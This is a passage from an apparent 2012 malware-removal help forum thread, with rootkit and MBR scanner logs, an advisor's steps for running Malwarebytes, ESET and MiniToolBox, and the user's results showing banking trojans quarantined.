14:30:03.0006 1144 SCardSvr (9b7395789e3791a3b6d000fe6f8b131e) C:\Windows\System32\SCardSvr.dll
14:30:03.0007 1144 SCardSvr - ok
14:30:03.0019 1144 scfilter (253f38d0d7074c02ff8deb9836c97d2b) C:\Windows\system32\DRIVERS\scfilter.sys
14:30:03.0020 1144 scfilter - ok
14:30:03.0052 1144 Schedule (262f6592c3299c005fd6bec90fc4463a) C:\Windows\system32\schedsvc.dll
14:30:03.0056 1144 Schedule - ok
14:30:03.0074 1144 SCPolicySvc (f17d1d393bbc69c5322fbfafaca28c7f) C:\Windows\System32\certprop.dll
14:30:03.0075 1144 SCPolicySvc - ok
14:30:03.0098 1144 SDRSVC (6ea4234dc55346e0709560fe7c2c1972) C:\Windows\System32\SDRSVC.dll
14:30:03.0099 1144 SDRSVC - ok
14:30:03.0135 1144 secdrv (3ea8a16169c26afbeb544e0e48421186) C:\Windows\system32\drivers\secdrv.sys
14:30:03.0136 1144 secdrv - ok
14:30:03.0172 1144 seclogon (bc617a4e1b4fa8df523a061739a0bd87) C:\Windows\system32\seclogon.dll
14:30:03.0172 1144 seclogon - ok
14:30:03.0198 1144 SENS (c32ab8fa018ef34c0f113bd501436d21) C:\Windows\System32\sens.dll
14:30:03.0199 1144 SENS - ok
14:30:03.0227 1144 SensrSvc (0336cffafaab87a11541f1cf1594b2b2) C:\Windows\system32\sensrsvc.dll
14:30:03.0227 1144 SensrSvc - ok
14:30:03.0249 1144 Serenum (cb624c0035412af0debec78c41f5ca1b) C:\Windows\system32\drivers\serenum.sys
14:30:03.0250 1144 Serenum - ok
14:30:03.0274 1144 Serial (c1d8e28b2c2adfaec4ba89e9fda69bd6) C:\Windows\system32\drivers\serial.sys
14:30:03.0275 1144 Serial - ok
14:30:03.0294 1144 sermouse (1c545a7d0691cc4a027396535691c3e3) C:\Windows\system32\drivers\sermouse.sys
14:30:03.0294 1144 sermouse - ok
14:30:03.0309 1144 SessionEnv (0b6231bf38174a1628c4ac812cc75804) C:\Windows\system32\sessenv.dll
14:30:03.0309 1144 SessionEnv - ok
14:30:03.0319 1144 sffdisk (a554811bcd09279536440c964ae35bbf) C:\Windows\system32\drivers\sffdisk.sys
14:30:03.0319 1144 sffdisk - ok
14:30:03.0326 1144 sffp_mmc (ff414f0baefeba59bc6c04b3db0b87bf) C:\Windows\system32\drivers\sffp_mmc.sys
14:30:03.0326 1144 sffp_mmc - ok
14:30:03.0332 1144 sffp_sd (dd85b78243a19b59f0637dcf284da63c) C:\Windows\system32\drivers\sffp_sd.sys
14:30:03.0332 1144 sffp_sd - ok
14:30:03.0339 1144 sfloppy (a9d601643a1647211a1ee2ec4e433ff4) C:\Windows\system32\drivers\sfloppy.sys
14:30:03.0339 1144 sfloppy - ok
14:30:03.0372 1144 SharedAccess (b95f6501a2f8b2e78c697fec401970ce) C:\Windows\System32\ipnathlp.dll
14:30:03.0374 1144 SharedAccess - ok
14:30:03.0404 1144 ShellHWDetection (aaf932b4011d14052955d4b212a4da8d) C:\Windows\System32\shsvcs.dll
14:30:03.0405 1144 ShellHWDetection - ok
14:30:03.0427 1144 SiSRaid2 (843caf1e5fde1ffd5ff768f23a51e2e1) C:\Windows\system32\drivers\SiSRaid2.sys
14:30:03.0427 1144 SiSRaid2 - ok
14:30:03.0461 1144 SiSRaid4 (6a6c106d42e9ffff8b9fcb4f754f6da4) C:\Windows\system32\drivers\sisraid4.sys
14:30:03.0461 1144 SiSRaid4 - ok
14:30:03.0498 1144 Smb (548260a7b8654e024dc30bf8a7c5baa4) C:\Windows\system32\DRIVERS\smb.sys
14:30:03.0498 1144 Smb - ok
14:30:03.0537 1144 SNMPTRAP (6313f223e817cc09aa41811daa7f541d) C:\Windows\System32\snmptrap.exe
14:30:03.0537 1144 SNMPTRAP - ok
14:30:03.0571 1144 spldr (b9e31e5cacdfe584f34f730a677803f9) C:\Windows\system32\drivers\spldr.sys
14:30:03.0571 1144 spldr - ok
14:30:03.0604 1144 Spooler (b96c17b5dc1424d56eea3a99e97428cd) C:\Windows\System32\spoolsv.exe
14:30:03.0606 1144 Spooler - ok
14:30:03.0667 1144 sppsvc (e17e0188bb90fae42d83e98707efa59c) C:\Windows\system32\sppsvc.exe
14:30:03.0678 1144 sppsvc - ok
14:30:03.0701 1144 sppuinotify (93d7d61317f3d4bc4f4e9f8a96a7de45) C:\Windows\system32\sppuinotify.dll
14:30:03.0702 1144 sppuinotify - ok
14:30:03.0796 1144 SpyHunter 4 Service (45a20a8416ee7dc7711953cc68b07643) C:\PROGRA~1\ENIGMA~1\SPYHUN~1\SH4SER~1.EXE
14:30:03.0800 1144 SpyHunter 4 Service - ok
14:30:03.0844 1144 srv (441fba48bff01fdb9d5969ebc1838f0b) C:\Windows\system32\DRIVERS\srv.sys
14:30:03.0845 1144 srv - ok
14:30:03.0863 1144 srv2 (b4adebbf5e3677cce9651e0f01f7cc28) C:\Windows\system32\DRIVERS\srv2.sys
14:30:03.0865 1144 srv2 - ok
14:30:03.0872 1144 srvnet (27e461f0be5bff5fc737328f749538c3) C:\Windows\system32\DRIVERS\srvnet.sys
14:30:03.0872 1144 srvnet - ok
14:30:03.0908 1144 SSDPSRV (51b52fbd583cde8aa9ba62b8b4298f33) C:\Windows\System32\ssdpsrv.dll
14:30:03.0910 1144 SSDPSRV - ok
14:30:03.0925 1144 SstpSvc (ab7aebf58dad8daab7a6c45e6a8885cb) C:\Windows\system32\sstpsvc.dll
14:30:03.0926 1144 SstpSvc - ok
14:30:03.0973 1144 Stereo Service (6086b60f2e36d06a063cb07ed0524332) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
14:30:03.0974 1144 Stereo Service - ok
14:30:04.0004 1144 stexstor (f3817967ed533d08327dc73bc4d5542a) C:\Windows\system32\drivers\stexstor.sys
14:30:04.0005 1144 stexstor - ok
14:30:04.0032 1144 stisvc (8dd52e8e6128f4b2da92ce27402871c1) C:\Windows\System32\wiaservc.dll
14:30:04.0034 1144 stisvc - ok
14:30:04.0055 1144 storflt (7785dc213270d2fc066538daf94087e7) C:\Windows\system32\drivers\vmstorfl.sys
14:30:04.0055 1144 storflt - ok
14:30:04.0072 1144 StorSvc (c40841817ef57d491f22eb103da587cc) C:\Windows\system32\storsvc.dll
14:30:04.0073 1144 StorSvc - ok
14:30:04.0088 1144 storvsc (d34e4943d5ac096c8edeebfd80d76e23) C:\Windows\system32\drivers\storvsc.sys
14:30:04.0089 1144 storvsc - ok
14:30:04.0111 1144 swenum (d01ec09b6711a5f8e7e6564a4d0fbc90) C:\Windows\system32\DRIVERS\swenum.sys
14:30:04.0112 1144 swenum - ok
14:30:04.0197 1144 SwitchBoard (f577910a133a592234ebaad3f3afa258) C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe
14:30:04.0198 1144 SwitchBoard - ok
14:30:04.0246 1144 swprv (e08e46fdd841b7184194011ca1955a0b) C:\Windows\System32\swprv.dll
14:30:04.0249 1144 swprv - ok
14:30:04.0295 1144 SysMain (bf9ccc0bf39b418c8d0ae8b05cf95b7d) C:\Windows\system32\sysmain.dll
14:30:04.0301 1144 SysMain - ok
14:30:04.0329 1144 TabletInputService (e3c61fd7b7c2557e1f1b0b4cec713585) C:\Windows\System32\TabSvc.dll
14:30:04.0330 1144 TabletInputService - ok
14:30:04.0362 1144 tap0901 (6e8732acfd4c8d1ec4a4e872168b8b92) C:\Windows\system32\DRIVERS\tap0901.sys
14:30:04.0362 1144 tap0901 - ok
14:30:04.0384 1144 TapiSrv (40f0849f65d13ee87b9a9ae3c1dd6823) C:\Windows\System32\tapisrv.dll
14:30:04.0386 1144 TapiSrv - ok
14:30:04.0418 1144 tapoas (927d0cdb3f96efc1e98fb1a2c9fb67ad) C:\Windows\system32\DRIVERS\tapoas.sys
14:30:04.0418 1144 tapoas - ok
14:30:04.0434 1144 TBS (1be03ac720f4d302ea01d40f588162f6) C:\Windows\System32\tbssvc.dll
14:30:04.0435 1144 TBS - ok
14:30:04.0486 1144 Tcpip (f0e98c00a09fdf791525829a1d14240f) C:\Windows\system32\drivers\tcpip.sys
14:30:04.0492 1144 Tcpip - ok
14:30:04.0543 1144 TCPIP6 (f0e98c00a09fdf791525829a1d14240f) C:\Windows\system32\DRIVERS\tcpip.sys
14:30:04.0549 1144 TCPIP6 - ok
14:30:04.0568 1144 tcpipreg (df687e3d8836bfb04fcc0615bf15a519) C:\Windows\system32\drivers\tcpipreg.sys
14:30:04.0569 1144 tcpipreg - ok
14:30:04.0595 1144 TDPIPE (3371d21011695b16333a3934340c4e7c) C:\Windows\system32\drivers\tdpipe.sys
14:30:04.0596 1144 TDPIPE - ok
14:30:04.0610 1144 TDTCP (e4245bda3190a582d55ed09e137401a9) C:\Windows\system32\drivers\tdtcp.sys
14:30:04.0610 1144 TDTCP - ok
14:30:04.0617 1144 tdx (ddad5a7ab24d8b65f8d724f5c20fd806) C:\Windows\system32\DRIVERS\tdx.sys
14:30:04.0618 1144 tdx - ok
14:30:04.0624 1144 TermDD (561e7e1f06895d78de991e01dd0fb6e5) C:\Windows\system32\DRIVERS\termdd.sys
14:30:04.0624 1144 TermDD - ok
14:30:04.0646 1144 TermService (2e648163254233755035b46dd7b89123) C:\Windows\System32\termsrv.dll
14:30:04.0648 1144 TermService - ok
14:30:04.0668 1144 Themes (f0344071948d1a1fa732231785a0664c) C:\Windows\system32\themeservice.dll
14:30:04.0668 1144 Themes - ok
14:30:04.0691 1144 THREADORDER (e40e80d0304a73e8d269f7141d77250b) C:\Windows\system32\mmcss.dll
14:30:04.0692 1144 THREADORDER - ok
14:30:04.0714 1144 TrkWks (7e7afd841694f6ac397e99d75cead49d) C:\Windows\System32\trkwks.dll
14:30:04.0715 1144 TrkWks - ok
14:30:04.0737 1144 TrustedInstaller (773212b2aaa24c1e31f10246b15b276c) C:\Windows\servicing\TrustedInstaller.exe
14:30:04.0738 1144 TrustedInstaller - ok
14:30:04.0771 1144 tssecsrv (ce18b2cdfc837c99e5fae9ca6cba5d30) C:\Windows\system32\DRIVERS\tssecsrv.sys
14:30:04.0771 1144 tssecsrv - ok
14:30:04.0799 1144 TsUsbFlt (d11c783e3ef9a3c52c0ebe83cc5000e9) C:\Windows\system32\drivers\tsusbflt.sys
14:30:04.0799 1144 TsUsbFlt - ok
14:30:04.0809 1144 TsUsbGD (9cc2ccae8a84820eaecb886d477cbcb8) C:\Windows\system32\drivers\TsUsbGD.sys
14:30:04.0810 1144 TsUsbGD - ok
14:30:04.0834 1144 tunnel (3566a8daafa27af944f5d705eaa64894) C:\Windows\system32\DRIVERS\tunnel.sys
14:30:04.0835 1144 tunnel - ok
14:30:04.0868 1144 uagp35 (b4dd609bd7e282bfc683cec7eaaaad67) C:\Windows\system32\drivers\uagp35.sys
14:30:04.0868 1144 uagp35 - ok
14:30:04.0877 1144 udfs (ff4232a1a64012baa1fd97c7b67df593) C:\Windows\system32\DRIVERS\udfs.sys
14:30:04.0878 1144 udfs - ok
14:30:04.0895 1144 UI0Detect (3cbdec8d06b9968aba702eba076364a1) C:\Windows\system32\UI0Detect.exe
14:30:04.0896 1144 UI0Detect - ok
14:30:04.0928 1144 UimBus (4bf243bf18de55c08a021dd37f54a097) C:\Windows\system32\DRIVERS\uimx64.sys
14:30:04.0929 1144 UimBus - ok
14:30:04.0944 1144 Uim_IM (743affe7920184238d37f4307198313b) C:\Windows\system32\Drivers\Uim_IMx64.sys
14:30:04.0946 1144 Uim_IM - ok
14:30:04.0966 1144 uliagpkx (4bfe1bc28391222894cbf1e7d0e42320) C:\Windows\system32\drivers\uliagpkx.sys
14:30:04.0967 1144 uliagpkx - ok
14:30:04.0995 1144 umbus (dc54a574663a895c8763af0fa1ff7561) C:\Windows\system32\DRIVERS\umbus.sys
14:30:04.0995 1144 umbus - ok
14:30:05.0026 1144 UmPass (b2e8e8cb557b156da5493bbddcc1474d) C:\Windows\system32\drivers\umpass.sys
14:30:05.0026 1144 UmPass - ok
14:30:05.0042 1144 UmRdpService (a293dcd756d04d8492a750d03b9a297c) C:\Windows\System32\umrdp.dll
14:30:05.0043 1144 UmRdpService - ok
14:30:05.0071 1144 upnphost (d47ec6a8e81633dd18d2436b19baf6de) C:\Windows\System32\upnphost.dll
14:30:05.0072 1144 upnphost - ok
14:30:05.0106 1144 USBAAPL64 (fb251567f41bc61988b26731dec19e4b) C:\Windows\system32\Drivers\usbaapl64.sys
14:30:05.0106 1144 USBAAPL64 - ok
14:30:05.0171 1144 usbccgp (481dff26b4dca8f4cbac1f7dce1d6829) C:\Windows\system32\DRIVERS\usbccgp.sys
14:30:05.0171 1144 usbccgp - ok
14:30:05.0188 1144 usbcir (af0892a803fdda7492f595368e3b68e7) C:\Windows\system32\drivers\usbcir.sys
14:30:05.0189 1144 usbcir - ok
14:30:05.0226 1144 usbehci (c025055fe7b87701eb042095df1a2d7b) C:\Windows\system32\drivers\usbehci.sys
14:30:05.0227 1144 usbehci - ok
14:30:05.0297 1144 usbhub (287c6c9410b111b68b52ca298f7b8c24) C:\Windows\system32\DRIVERS\usbhub.sys
14:30:05.0298 1144 usbhub - ok
14:30:05.0330 1144 usbohci (9840fc418b4cbd632d3d0a667a725c31) C:\Windows\system32\drivers\usbohci.sys
14:30:05.0330 1144 usbohci - ok
14:30:05.0352 1144 usbprint (73188f58fb384e75c4063d29413cee3d) C:\Windows\system32\drivers\usbprint.sys
14:30:05.0352 1144 usbprint - ok
14:30:05.0369 1144 usbscan (aaa2513c8aed8b54b189fd0c6b1634c0) C:\Windows\system32\DRIVERS\usbscan.sys
14:30:05.0369 1144 usbscan - ok
14:30:05.0391 1144 USBSTOR (fed648b01349a3c8395a5169db5fb7d6) C:\Windows\system32\DRIVERS\USBSTOR.SYS
14:30:05.0391 1144 USBSTOR - ok
14:30:05.0425 1144 usbuhci (62069a34518bcf9c1fd9e74b3f6db7cd) C:\Windows\system32\drivers\usbuhci.sys
14:30:05.0426 1144 usbuhci - ok
14:30:05.0450 1144 UxSms (edbb23cbcf2cdf727d64ff9b51a6070e) C:\Windows\System32\uxsms.dll
14:30:05.0451 1144 UxSms - ok
14:30:05.0492 1144 VaultSvc (0793f40b9b8a1bdd266296409dbd91ea) C:\Windows\system32\lsass.exe
14:30:05.0493 1144 VaultSvc - ok
14:30:05.0535 1144 VClone (fd911873c0bb6945fa38c16e9a2b58f9) C:\Windows\system32\DRIVERS\VClone.sys
14:30:05.0535 1144 VClone - ok
14:30:05.0556 1144 vdrvroot (c5c876ccfc083ff3b128f933823e87bd) C:\Windows\system32\drivers\vdrvroot.sys
14:30:05.0556 1144 vdrvroot - ok
14:30:05.0576 1144 vds (8d6b481601d01a456e75c3210f1830be) C:\Windows\System32\vds.exe
14:30:05.0579 1144 vds - ok
14:30:05.0592 1144 vga (da4da3f5e02943c2dc8c6ed875de68dd) C:\Windows\system32\DRIVERS\vgapnp.sys
14:30:05.0592 1144 vga - ok
14:30:05.0601 1144 VgaSave (53e92a310193cb3c03bea963de7d9cfc) C:\Windows\System32\drivers\vga.sys
14:30:05.0601 1144 VgaSave - ok
14:30:05.0618 1144 vhdmp (2ce2df28c83aeaf30084e1b1eb253cbb) C:\Windows\system32\drivers\vhdmp.sys
14:30:05.0619 1144 vhdmp - ok
14:30:05.0652 1144 viaide (e5689d93ffe4e5d66c0178761240dd54) C:\Windows\system32\drivers\viaide.sys
14:30:05.0652 1144 viaide - ok
14:30:05.0669 1144 vmbus (86ea3e79ae350fea5331a1303054005f) C:\Windows\system32\drivers\vmbus.sys
14:30:05.0670 1144 vmbus - ok
14:30:05.0686 1144 VMBusHID (7de90b48f210d29649380545db45a187) C:\Windows\system32\drivers\VMBusHID.sys
14:30:05.0687 1144 VMBusHID - ok
14:30:05.0709 1144 volmgr (d2aafd421940f640b407aefaaebd91b0) C:\Windows\system32\drivers\volmgr.sys
14:30:05.0709 1144 volmgr - ok
14:30:05.0744 1144 volmgrx (a255814907c89be58b79ef2f189b843b) C:\Windows\system32\drivers\volmgrx.sys
14:30:05.0746 1144 volmgrx - ok
14:30:05.0766 1144 volsnap (0d08d2f3b3ff84e433346669b5e0f639) C:\Windows\system32\drivers\volsnap.sys
14:30:05.0767 1144 volsnap - ok
14:30:05.0785 1144 vsmraid (5e2016ea6ebaca03c04feac5f330d997) C:\Windows\system32\drivers\vsmraid.sys
14:30:05.0785 1144 vsmraid - ok
14:30:05.0823 1144 VSS (b60ba0bc31b0cb414593e169f6f21cc2) C:\Windows\system32\vssvc.exe
14:30:05.0828 1144 VSS - ok
14:30:05.0860 1144 vwifibus (36d4720b72b5c5d9cb2b9c29e9df67a1) C:\Windows\system32\DRIVERS\vwifibus.sys
14:30:05.0860 1144 vwifibus - ok
14:30:05.0893 1144 vwififlt (6a3d66263414ff0d6fa754c646612f3f) C:\Windows\system32\DRIVERS\vwififlt.sys
14:30:05.0893 1144 vwififlt - ok
14:30:05.0922 1144 W32Time (1c9d80cc3849b3788048078c26486e1a) C:\Windows\system32\w32time.dll
14:30:05.0924 1144 W32Time - ok
14:30:05.0951 1144 WacomPen (4e9440f4f152a7b944cb1663d3935a3e) C:\Windows\system32\drivers\wacompen.sys
14:30:05.0952 1144 WacomPen - ok
14:30:05.0994 1144 WANARP (356afd78a6ed4457169241ac3965230c) C:\Windows\system32\DRIVERS\wanarp.sys
14:30:05.0994 1144 WANARP - ok
14:30:06.0016 1144 Wanarpv6 (356afd78a6ed4457169241ac3965230c) C:\Windows\system32\DRIVERS\wanarp.sys
14:30:06.0016 1144 Wanarpv6 - ok
14:30:06.0068 1144 WatAdminSvc (3cec96de223e49eaae3651fcf8faea6c) C:\Windows\system32\Wat\WatAdminSvc.exe
14:30:06.0072 1144 WatAdminSvc - ok
14:30:06.0107 1144 wbengine (78f4e7f5c56cb9716238eb57da4b6a75) C:\Windows\system32\wbengine.exe
14:30:06.0113 1144 wbengine - ok
14:30:06.0130 1144 WbioSrvc (3aa101e8edab2db4131333f4325c76a3) C:\Windows\System32\wbiosrvc.dll
14:30:06.0131 1144 WbioSrvc - ok
14:30:06.0151 1144 wcncsvc (7368a2afd46e5a4481d1de9d14848edd) C:\Windows\System32\wcncsvc.dll
14:30:06.0153 1144 wcncsvc - ok
14:30:06.0166 1144 WcsPlugInService (20f7441334b18cee52027661df4a6129) C:\Windows\System32\WcsPlugInService.dll
14:30:06.0167 1144 WcsPlugInService - ok
14:30:06.0194 1144 Wd (72889e16ff12ba0f235467d6091b17dc) C:\Windows\system32\drivers\wd.sys
14:30:06.0195 1144 Wd - ok
14:30:06.0239 1144 WDC_SAM (a3d04ebf5227886029b4532f20d026f7) C:\Windows\system32\DRIVERS\wdcsam64.sys
14:30:06.0239 1144 WDC_SAM - ok
14:30:06.0275 1144 Wdf01000 (441bd2d7b4f98134c3a4f9fa570fd250) C:\Windows\system32\drivers\Wdf01000.sys
14:30:06.0277 1144 Wdf01000 - ok
14:30:06.0299 1144 WdiServiceHost (bf1fc3f79b863c914687a737c2f3d681) C:\Windows\system32\wdi.dll
14:30:06.0300 1144 WdiServiceHost - ok
14:30:06.0303 1144 WdiSystemHost (bf1fc3f79b863c914687a737c2f3d681) C:\Windows\system32\wdi.dll
14:30:06.0304 1144 WdiSystemHost - ok
14:30:06.0344 1144 WebClient (3db6d04e1c64272f8b14eb8bc4616280) C:\Windows\System32\webclnt.dll
14:30:06.0346 1144 WebClient - ok
14:30:06.0366 1144 Wecsvc (c749025a679c5103e575e3b48e092c43) C:\Windows\system32\wecsvc.dll
14:30:06.0368 1144 Wecsvc - ok
14:30:06.0390 1144 wercplsupport (7e591867422dc788b9e5bd337a669a08) C:\Windows\System32\wercplsupport.dll
14:30:06.0391 1144 wercplsupport - ok
14:30:06.0417 1144 WerSvc (6d137963730144698cbd10f202e9f251) C:\Windows\System32\WerSvc.dll
14:30:06.0449 1144 WerSvc - ok
14:30:06.0633 1144 WfpLwf (611b23304bf067451a9fdee01fbdd725) C:\Windows\system32\DRIVERS\wfplwf.sys
14:30:06.0634 1144 WfpLwf - ok
14:30:06.0659 1144 WIMMount (05ecaec3e4529a7153b3136ceb49f0ec) C:\Windows\system32\drivers\wimmount.sys
14:30:06.0659 1144 WIMMount - ok
14:30:06.0672 1144 WinDefend - ok
14:30:06.0674 1144 WinHttpAutoProxySvc - ok
14:30:06.0714 1144 Winmgmt (19b07e7e8915d701225da41cb3877306) C:\Windows\system32\wbem\WMIsvc.dll
14:30:06.0715 1144 Winmgmt - ok
14:30:06.0754 1144 WinRM (bcb1310604aa415c4508708975b3931e) C:\Windows\system32\WsmSvc.dll
14:30:06.0761 1144 WinRM - ok
14:30:06.0821 1144 WinUsb (fe88b288356e7b47b74b13372add906d) C:\Windows\system32\DRIVERS\WinUsb.sys
14:30:06.0821 1144 WinUsb - ok
14:30:06.0851 1144 Wlansvc (4fada86e62f18a1b2f42ba18ae24e6aa) C:\Windows\System32\wlansvc.dll
14:30:06.0855 1144 Wlansvc - ok
14:30:06.0883 1144 WmiAcpi (f6ff8944478594d0e414d3f048f0d778) C:\Windows\system32\DRIVERS\wmiacpi.sys
14:30:06.0884 1144 WmiAcpi - ok
14:30:06.0956 1144 wmiApSrv (38b84c94c5a8af291adfea478ae54f93) C:\Windows\system32\wbem\WmiApSrv.exe
14:30:06.0957 1144 wmiApSrv - ok
14:30:06.0982 1144 WMPNetworkSvc - ok
14:30:07.0025 1144 WPCSvc (96c6e7100d724c69fcf9e7bf590d1dca) C:\Windows\System32\wpcsvc.dll
14:30:07.0026 1144 WPCSvc - ok
14:30:07.0049 1144 WPDBusEnum (93221146d4ebbf314c29b23cd6cc391d) C:\Windows\system32\wpdbusenum.dll
14:30:07.0050 1144 WPDBusEnum - ok
14:30:07.0073 1144 ws2ifsl (6bcc1d7d2fd2453957c5479a32364e52) C:\Windows\system32\drivers\ws2ifsl.sys
14:30:07.0073 1144 ws2ifsl - ok
14:30:07.0090 1144 wscsvc (e8b1fe6669397d1772d8196df0e57a9e) C:\Windows\System32\wscsvc.dll
14:30:07.0091 1144 wscsvc - ok
14:30:07.0096 1144 WSearch - ok
14:30:07.0146 1144 wuauserv (9df12edbc698b0bc353b3ef84861e430) C:\Windows\system32\wuaueng.dll
14:30:07.0154 1144 wuauserv - ok
14:30:07.0166 1144 WudfPf (d3381dc54c34d79b22cee0d65ba91b7c) C:\Windows\system32\drivers\WudfPf.sys
14:30:07.0167 1144 WudfPf - ok
14:30:07.0192 1144 WUDFRd (cf8d590be3373029d57af80914190682) C:\Windows\system32\DRIVERS\WUDFRd.sys
14:30:07.0193 1144 WUDFRd - ok
14:30:07.0236 1144 wudfsvc (7a95c95b6c4cf292d689106bcae49543) C:\Windows\System32\WUDFSvc.dll
14:30:07.0237 1144 wudfsvc - ok
14:30:07.0260 1144 WwanSvc (9a3452b3c2a46c073166c5cf49fad1ae) C:\Windows\System32\wwansvc.dll
14:30:07.0261 1144 WwanSvc - ok
14:30:07.0282 1144 MBR (0x1B8) (a36c5e4f47e84449ff07ed3517b43a31) \Device\Harddisk0\DR0
14:30:07.0331 1144 \Device\Harddisk0\DR0 - ok
14:30:07.0332 1144 MBR (0x1B8) (a36c5e4f47e84449ff07ed3517b43a31) \Device\Harddisk1\DR1
14:30:07.0333 1144 \Device\Harddisk1\DR1 - ok
14:30:07.0335 1144 MBR (0x1B8) (8f558eb6672622401da993e1e865c861) \Device\Harddisk2\DR2
14:30:07.0337 1144 \Device\Harddisk2\DR2 - ok
14:30:07.0340 1144 MBR (0x1B8) (8f558eb6672622401da993e1e865c861) \Device\Harddisk3\DR3
14:30:07.0341 1144 \Device\Harddisk3\DR3 - ok
14:30:07.0344 1144 MBR (0x1B8) (8f558eb6672622401da993e1e865c861) \Device\Harddisk4\DR4
14:30:07.0345 1144 \Device\Harddisk4\DR4 - ok
14:30:07.0348 1144 Boot (0x1200) (1d2cb8150f0740eb48d664aa25ad3815) \Device\Harddisk0\DR0\Partition0
14:30:07.0348 1144 \Device\Harddisk0\DR0\Partition0 - ok
14:30:07.0349 1144 Boot (0x1200) (bc2a3a7628ae1e115bff7546ca69bf1a) \Device\Harddisk1\DR1\Partition0
14:30:07.0350 1144 \Device\Harddisk1\DR1\Partition0 - ok
14:30:07.0351 1144 Boot (0x1200) (18dfeb311eea2ed9e116ccdfd8e31239) \Device\Harddisk2\DR2\Partition0
14:30:07.0353 1144 \Device\Harddisk2\DR2\Partition0 - ok
14:30:07.0355 1144 Boot (0x1200) (679468958eaf69d7baf921957bb6c2fa) \Device\Harddisk3\DR3\Partition0
14:30:07.0357 1144 \Device\Harddisk3\DR3\Partition0 - ok
14:30:07.0358 1144 Boot (0x1200) (2850fe8e11c8cd6bbdf902ac145d278c) \Device\Harddisk4\DR4\Partition0
14:30:07.0359 1144 \Device\Harddisk4\DR4\Partition0 - ok
14:30:07.0360 1144 ============================================================
14:30:07.0360 1144 Scan finished
14:30:07.0360 1144 ============================================================
14:30:07.0364 6204 Detected object count: 0
14:30:07.0364 6204 Actual detected object count: 0


#######################################################################

aswMBR:

aswMBR version 0.9.9.1665 Copyright© 2011 AVAST Software
Run date: 2012-04-16 14:31:30
-----------------------------
14:31:30.729 OS Version: Windows x64 6.1.7601 Service Pack 1
14:31:30.729 Number of processors: 8 586 0x2A07
14:31:30.729 ComputerName: OWNER-PC110658 UserName: Owner
14:31:36.901 Initialize success
14:32:17.146 AVAST engine defs: 12041600
14:32:21.730 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IAAStorageDevice-1
14:32:21.731 Disk 0 Vendor: ST350041 JC45 Size: 476940MB BusType: 8
14:32:21.732 Disk 1 \Device\Harddisk1\DR1 -> \Device\Ide\IAAStorageDevice-2
14:32:21.733 Disk 1 Vendor: ST310005 JC45 Size: 953869MB BusType: 8
14:32:21.742 Disk 0 MBR read successfully
14:32:21.744 Disk 0 MBR scan
14:32:21.746 Disk 0 Windows 7 default MBR code
14:32:21.749 Disk 0 Partition 1 80 (A) 07 HPFS/NTFS NTFS 463507 MB offset 2048
14:32:21.772 Disk 0 Partition 2 00 BC BCFS 13431 MB offset 949264785
14:32:21.809 Disk 0 scanning C:\Windows\system32\drivers
14:32:30.053 Service scanning
14:32:44.960 Modules scanning
14:32:44.964 Disk 0 trace - called modules:
14:32:44.979 ntoskrnl.exe CLASSPNP.SYS disk.sys iaStor.sys hal.dll
14:32:44.981 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0xfffffa80090c5790]
14:32:44.983 3 CLASSPNP.SYS[fffff88001a5143f] -> nt!IofCallDriver -> \Device\Ide\IAAStorageDevice-1[0xfffffa8007242050]
14:32:47.852 AVAST engine scan C:\Windows
14:32:49.593 AVAST engine scan C:\Windows\system32
14:34:03.573 AVAST engine scan C:\Windows\system32\drivers
14:34:14.650 AVAST engine scan C:\Users\Owner
14:36:11.011 File: C:\Users\Owner\AppData\Roaming\BAcroIEHelpe.dll **INFECTED** Win32:Agent-AOHP [Trj]
14:39:36.099 AVAST engine scan C:\ProgramData
14:40:37.265 Scan finished successfully
14:41:15.909 Disk 0 MBR has been saved successfully to "C:\Users\Owner\Desktop\MBR.dat"
14:41:15.911 The log file has been saved successfully to "C:\Users\Owner\Desktop\aswMBR.txt"

#6 narenxp

narenxp

  • BC Advisor
  • 16,371 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:India
  • Local time:12:56 PM

Posted 16 April 2012 - 08:45 PM

Download

http://www.techspot.com/downloads/4716-malwarebytes-anti-malware.html

Install,update and run a full scan

Click on SHOW results.Select all infections and remove it

Reboot the PC and scan MBAM once in regular mode until you get a clean log

Download

ESET online scanner


Install it

Click on START,it should download the virus definitions
When scan gets completed,click on LIST of found threats

Export the list to desktop,copy the contents of the text file in your reply


Download

mini toolbox

Checkmark following boxes:

Flush DNS
Report IE Proxy Settings
Reset IE Proxy Settings
Report FF Proxy Settings
Reset FF Proxy Settings
List content of Hosts
List IP configuration
List Winsock Entries
List last 10 Event Viewer log
List Installed Programs
List Users, Partitions and Memory size

Click Go and post the result.

#7 mattsbach

mattsbach
  • Topic Starter

  • Members
  • 85 posts
  • OFFLINE
  •  
  • Local time:01:56 PM

Posted 16 April 2012 - 10:30 PM

MBAM was clean so I moved on to...

ESET:

C:\Users\Owner\AppData\Roaming\BAcroIEHelpe.dll Win32/Spy.Banker.XOR trojan cleaned by deleting - quarantined
C:\Users\Owner\AppData\Roaming\11003\components\AcroFF.dll Win32/Spy.Banker.XOS trojan cleaned by deleting (after the next restart) - quarantined

######################

And MiniToolbox:


MiniToolBox by Farbar Version: 18-01-2012
Ran by Owner (administrator) on 16-04-2012 at 23:28:44
Microsoft Windows 7 Professional Service Pack 1 (X64)
Boot Mode: Normal
***************************************************************************

========================= Flush DNS: ===================================

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========================= IE Proxy Settings: ==============================

Proxy is not enabled.
No Proxy Server is set.

"Reset IE Proxy Settings": IE Proxy Settings were reset.

========================= FF Proxy Settings: ==============================


"Reset FF Proxy Settings": Firefox Proxy settings were reset.

========================= Hosts content: =================================

#8 narenxp

narenxp

  • BC Advisor
  • 16,371 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:India
  • Local time:12:56 PM

Posted 16 April 2012 - 10:33 PM

Try to post minitoolbox log again

I know that your hosts file has been hijacked but you should be able to post the complete log here

good luck

#9 mattsbach

mattsbach
  • Topic Starter

  • Members
  • 85 posts
  • OFFLINE
  •  
  • Local time:01:56 PM

Posted 16 April 2012 - 10:41 PM

Aha - forgot to scroll down. And now I see the bogus entries in my hosts file too. okay, didn't touch anything yet, here's the full toolbox result:



MiniToolBox by Farbar Version: 18-01-2012
Ran by Owner (administrator) on 16-04-2012 at 23:38:12
